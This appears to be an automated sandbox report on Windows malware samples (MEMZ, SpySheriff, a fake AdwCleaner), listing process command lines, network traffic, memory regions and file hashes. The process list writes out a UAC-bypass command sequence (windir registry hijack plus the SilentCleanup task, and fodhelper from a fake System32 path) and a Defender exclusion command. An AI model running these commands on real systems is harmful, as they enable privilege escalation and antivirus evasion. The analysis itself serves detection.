"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=6984 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\Notepad.exe

C:\Windows\System32\Notepad.exe

C:\Windows\SysWOW64\Notepad.exe

C:\Windows\System32\Notepad.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "

C:\Program Files (x86)\internet explorer\ieinstal.exe

"C:\Program Files (x86)\internet explorer\ieinstal.exe"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Natso.bat" "

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Program Files (x86)\internet explorer\ieinstal.exe

"C:\Program Files (x86)\internet explorer\ieinstal.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=4928 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\AdwereCleaner.exe

"C:\Users\Admin\Downloads\AdwereCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\Downloads\AdwereCleaner.exe

"C:\Users\Admin\Downloads\AdwereCleaner.exe"

C:\Users\Admin\Downloads\AdwereCleaner.exe

"C:\Users\Admin\Downloads\AdwereCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

"C:\Users\Admin\AppData\Local\6AdwCleaner.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Runex.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2588 -ip 2588

C:\Windows \System32\fodhelper.exe

"C:\Windows \System32\fodhelper.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c C:\Users\Public\x.bat

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Public\x.vbs

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 428

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Public\x.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\cde.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 2588 -ip 2588

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 440

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --mojo-platform-channel-handle=6864 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=7212 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7228 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\SpySheriff.exe

"C:\Users\Admin\Downloads\SpySheriff.exe"

C:\Users\Admin\Downloads\SpySheriff.exe

"C:\Users\Admin\Downloads\SpySheriff.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --mojo-platform-channel-handle=7304 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7452 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe"

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /watchdog

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe" /main

C:\Windows\SysWOW64\notepad.exe

"C:\Windows\System32\notepad.exe" \note.txt

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=virus+builder+legit+free+download

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --mojo-platform-channel-handle=7056 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --mojo-platform-channel-handle=5252 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=mcafee+vs+norton

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --mojo-platform-channel-handle=6120 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --mojo-platform-channel-handle=7296 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --mojo-platform-channel-handle=6748 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --mojo-platform-channel-handle=6464 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --mojo-platform-channel-handle=7644 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --mojo-platform-channel-handle=7656 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:8

C:\Users\Admin\Downloads\MEMZ.exe

"C:\Users\Admin\Downloads\MEMZ.exe"

C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe

"C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe"

C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe

"C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://google.co.ck/search?q=dank+memz

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --mojo-platform-channel-handle=7560 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --no-appcompat-clear --disable-gpu-compositing --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --mojo-platform-channel-handle=6984 --field-trial-handle=2272,i,1589057049575649654,2929151440327217574,262144 --variations-seed-version /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
GB 20.26.156.215:443 github.com tcp
GB 13.87.96.169:443 nav-edge.smartscreen.microsoft.com tcp
GB 13.87.96.169:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 13.107.6.158:443 business.bing.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 104.91.71.140:443 bzib.nelreports.net tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
NL 72.246.173.187:443 www.microsoft.com tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 169.96.87.13.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 140.71.91.104.in-addr.arpa udp
US 8.8.8.8:53 187.173.246.72.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.112.22:443 collector.github.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 140.82.112.22:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 185.199.108.154:443 github.githubassets.com tcp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 22.112.82.140.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 210.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 104.208.16.94:443 nw-umwatson.events.data.microsoft.com tcp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 94.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 134.71.91.104.in-addr.arpa udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
NL 23.62.61.194:443 www.bing.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 telem-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 telem-edge.smartscreen.microsoft.com udp
GB 51.140.244.186:443 telem-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 186.244.140.51.in-addr.arpa udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 158.145.162.20.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
GB 20.26.156.210:443 api.github.com tcp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 155.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 84.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 telem-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 telem-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.179.234:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
NL 23.62.61.155:443 www.bing.com tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.38.233:80 crl.usertrust.com tcp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.38.233:80 crl.comodoca.com tcp
US 8.8.8.8:53 drive.google.com udp
GB 172.217.16.238:443 drive.google.com tcp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
GB 172.217.16.238:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
GB 142.250.187.193:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 193.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 tamerimia.ug udp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
US 172.64.149.23:80 crl.comodoca.com tcp
US 104.18.38.233:80 crl.comodoca.com tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
NL 23.62.61.155:443 www.bing.com tcp
GB 20.26.156.210:443 api.github.com tcp
CA 69.50.175.178:80 tcp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 vbchjfssdfcxbcver.ru udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
CA 69.50.175.178:80 tcp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
GB 172.217.16.228:80 google.co.ck tcp
GB 172.217.16.228:80 google.co.ck tcp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 google.co.ck udp
GB 172.217.16.228:443 google.co.ck tcp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.178.4:443 www.google.com tcp
GB 142.250.178.4:443 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
GB 172.217.16.228:443 google.co.ck tcp
US 8.8.8.8:53 4.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 3.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 tamerimia.ug udp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
GB 172.217.16.228:443 google.co.ck udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
NL 72.246.173.187:443 www.microsoft.com tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
NL 23.62.61.155:443 www.bing.com udp
US 8.8.8.8:53 collector.github.com udp
US 8.8.8.8:53 collector.github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 api.github.com udp
US 8.8.8.8:53 api.github.com udp
GB 20.26.156.210:443 api.github.com tcp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 dl-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 app-edge.smartscreen.microsoft.com udp
GB 20.162.145.158:443 app-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 google.co.ck udp
US 8.8.8.8:53 www.google.co.ck udp
US 8.8.8.8:53 www.google.co.ck udp
US 8.8.8.8:53 www.google.co.ck udp
GB 142.250.179.227:443 www.google.co.ck tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.co.ck udp
US 8.8.8.8:53 www.google.co.ck udp
GB 142.250.179.227:443 www.google.co.ck tcp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp

Files

memory/2668-0-0x0000000000F00000-0x0000000000F6E000-memory.dmp

memory/2668-1-0x0000000074C50000-0x0000000075400000-memory.dmp

memory/2668-2-0x0000000005E80000-0x0000000006424000-memory.dmp

memory/2668-3-0x00000000059B0000-0x0000000005A42000-memory.dmp

memory/2668-4-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/2668-5-0x0000000005970000-0x000000000597A000-memory.dmp

memory/2668-6-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/2668-14-0x0000000074C50000-0x0000000075400000-memory.dmp

memory/2668-15-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/2668-16-0x0000000005B70000-0x0000000005B80000-memory.dmp

memory/4924-17-0x0000000002300000-0x0000000002301000-memory.dmp

memory/3556-18-0x0000000000650000-0x0000000000651000-memory.dmp

memory/1364-20-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/1364-21-0x00000000006B0000-0x00000000006B1000-memory.dmp

memory/4924-54-0x0000000002300000-0x0000000002301000-memory.dmp

memory/3556-59-0x0000000000650000-0x0000000000651000-memory.dmp

memory/1364-1725-0x0000000010410000-0x000000001047E000-memory.dmp

memory/3004-1727-0x0000000010410000-0x000000001047E000-memory.dmp

memory/1904-1740-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

memory/1904-1742-0x0000000000B70000-0x0000000000B71000-memory.dmp

memory/1904-1748-0x0000000000AC0000-0x0000000000AC1000-memory.dmp

memory/1364-1751-0x0000000010410000-0x000000001047E000-memory.dmp

memory/3004-1754-0x0000000010410000-0x000000001047E000-memory.dmp

memory/1904-1755-0x0000000002730000-0x0000000002731000-memory.dmp

memory/2588-1780-0x00000000006E0000-0x00000000006E1000-memory.dmp

memory/2588-1781-0x00000000007D0000-0x00000000007D1000-memory.dmp

memory/2588-1796-0x0000000000760000-0x0000000000761000-memory.dmp

memory/2588-1815-0x0000000002590000-0x0000000002591000-memory.dmp

memory/1904-2203-0x0000000010480000-0x00000000104C4000-memory.dmp

memory/6532-2250-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Public\Natso.bat

MD5 5cc1682955fd9f5800a8f1530c9a4334
SHA1 e09b6a4d729f2f4760ee42520ec30c3192c85548
SHA256 5562cc607d2f698327efacc4a21bd079bb14a99b03e7a01b3c67f8440e341cb3
SHA512 80767263aad44c739236161d4338d5dd8b0b58613f22cd173c3e88ebf143220ee56bbf93ace69a07d3c2f00daff0adbaa8461a1d53d12699725395c931c43cb6

C:\Users\Public\x.vbs

MD5 70f4e3618d69b36ca74f412ac75ec1fa
SHA1 59fb651c5c976c86f3e02811b0250ca7dc10eb3a
SHA256 c120ecbb33c2092fe379bcd2edbd702ea0a571ec99c233f8441e70e8ac62efd9
SHA512 fa4aa79f35d4d5999f5237aaf46314a2de0c88ba8ea3c4a33be50fbeb53d9bb201033965e4aee17be13081a082daaaed3aae5c84181f24e9723b762a453bf191

C:\Users\Public\x.bat

MD5 47b8b6e888806f25ee24e55a6b116262
SHA1 1fbb022a6c3183f21806c19230a8ad421df9a2ae
SHA256 61e8f32d99ac46e7eab3e976b0afcadc55ad837d696f0b2a003fe9cd4f34335e
SHA512 a240e3b7f1a529da2dba304786da101548a039306c63f28c34f60973319ba37564e51493d021cd2c2adae4eecd98e8d6dd80e8b46472a6f6e7d1b069d000317a

C:\Users\Public\cde.bat

MD5 b442a70fdba934a802a468446c697646
SHA1 fe28bd0ab4831dc3bd71b774bdfac829b8806a35
SHA256 c8dbdd9043f83f13287d442bcd98d06376d19a1d82f4e1dd4c9449f9b2ae0c7d
SHA512 47b6d6396db728ad358c8104632f2be9e305ae674f2b08d501a68cded63c462316cdd18e861d9d411958b1012aaac4620239ca6029db6112285a8e06134d1903

memory/2588-2275-0x0000000010480000-0x00000000104C4000-memory.dmp

memory/1364-2300-0x0000000010410000-0x000000001047E000-memory.dmp

memory/6296-2301-0x0000000000400000-0x0000000000433000-memory.dmp

C:\Users\Admin\AppData\Local\6AdwCleaner.exe

MD5 87e4959fefec297ebbf42de79b5c88f6
SHA1 eba50d6b266b527025cd624003799bdda9a6bc86
SHA256 4f0033e811fe2497b38f0d45df958829d01933ebe7d331079eefc8e38fbeaa61
SHA512 232fedec0180e85560a226870a244a22f54ca130ed6d6dc95dc02a1ff85f17da396925c9ff27d522067a30ee3e74a38adff375d8752161ee629df14f39cf6ba9

memory/3116-2313-0x00000000003C0000-0x00000000003EE000-memory.dmp

memory/3116-2314-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/3116-2315-0x000000001B100000-0x000000001B110000-memory.dmp

memory/8156-2318-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2319-0x0000000000E20000-0x0000000000E30000-memory.dmp

memory/7208-2320-0x0000000002F50000-0x0000000002F60000-memory.dmp

memory/3116-2321-0x000000001B100000-0x000000001B110000-memory.dmp

memory/7208-2322-0x00007FFB75A20000-0x00007FFB764E1000-memory.dmp

memory/8156-2323-0x0000000000E20000-0x0000000000E30000-memory.dmp

